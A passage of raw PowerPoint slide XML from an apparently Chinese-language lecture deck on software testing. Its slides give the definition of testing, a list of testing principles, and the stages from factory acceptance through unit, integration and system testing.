              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>瀑布</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模型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27380" y="1212215"/>
            <a:ext cx="10521950" cy="5334000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>04</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:t>软件安全</a:t>
            </a:r>
            <a:r>
              <a:t>测试</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测试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371600" y="1493520"/>
            <a:ext cx="9171940" cy="424624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什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是软件测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用人工和自动化的手段来运行或测试某个系统的过程，其目的在于检验它是否满足规定的需求或是弄清预期结果与实际结果之间的差异</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基本概念</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>测试用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一组特殊的测试输入，执行条件和预期结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>测试覆盖率度量指标</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基于需求的覆盖</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基于代码的覆盖</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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软件测试的基本概念</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371600" y="1493520"/>
            <a:ext cx="9171940" cy="3830955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测试的信条</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>预期测试的测试结果是预先确定的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>好的测试用例发现错误的概率高</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>成功的测试就是发现了错误的测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>测试独立于编码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>需要具备应用（用户）及软件（编程）两方面的专业知识</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>测试人员使用不同于开发人员的工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>只检查常见的测试用例是不够的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>测试文档要能够再利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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软件测试方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>阶段</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058035" y="2152015"/>
            <a:ext cx="8529320" cy="3315970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>出厂</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测试、冒烟测试、单元测试、集成测试、系统测试、验收测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>黑盒测试、白盒测试、灰盒测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>静态测试、动态测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码走查、代码审查、代码评审</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>回归测试、生产接受</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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软件测试阶段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>出厂测试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87960" y="1271270"/>
            <a:ext cx="11027410" cy="5126990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定义：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>出厂测试也称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>FAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测试，是指在供应商的场所进行的测试，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主要验证系统或设备的设计、制造和功能符合预定的规格，识别潜在问题和缺陷，以便在交付前进行修复。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目的：确保每个单元按预期工作，能够处理各种输入并返回正确输出。主要是基于白盒测试。（也就是说，在单元测试过程中，用的最多的是白盒测试方法，也可能会有灰盒或者黑盒。单元测试和白盒测试是不同的划分，不存在包含关系）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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软件测试阶段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单元</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测试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87960" y="1271270"/>
            <a:ext cx="11027410" cy="5126990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定义：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单元测试，又称模块测试。对软件的组成单位进行测试，其目的是检验软件基本组成单位的正确性。测试的对象是软件里测试的最小单位：模块。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目的：确保模块的连通性，保证有正常的输入以及正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>输出，主要是基于白盒测试。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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软件测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>阶段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>集成测试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87960" y="1271270"/>
            <a:ext cx="11027410" cy="5126990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定义：集成测试是在单元测试之后，对多个单元（通常是模块或组件）进行组合测试，以验证它们的接口和交互是否正常。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目的：识别模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>之间的接口问题和数据流问题，确保不同模块能够协同工作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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软件测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>阶段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统测试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87960" y="1271270"/>
            <a:ext cx="11027410" cy="5126990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定义：系统测试是在集成测试完成后进行的，目的是在整个系统环境中测试系统的功能和性能。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目的：验证系统是否符合需求规格，评估系统的整体功能、性能、安全性和可靠性。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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软件测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>阶段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统集成测试</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87960" y="1271270"/>
            <a:ext cx="11027410" cy="5126990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>定义：系统集成测试是对整个系统及其与外部系统的集成进行的测试，确保各个部分之间的交互正常。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目的：验证系统与外部环境的集成情况，包括与外部接口、系统和服务的交互。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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软件测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>阶段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>回归测试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87960" y="1271270"/>
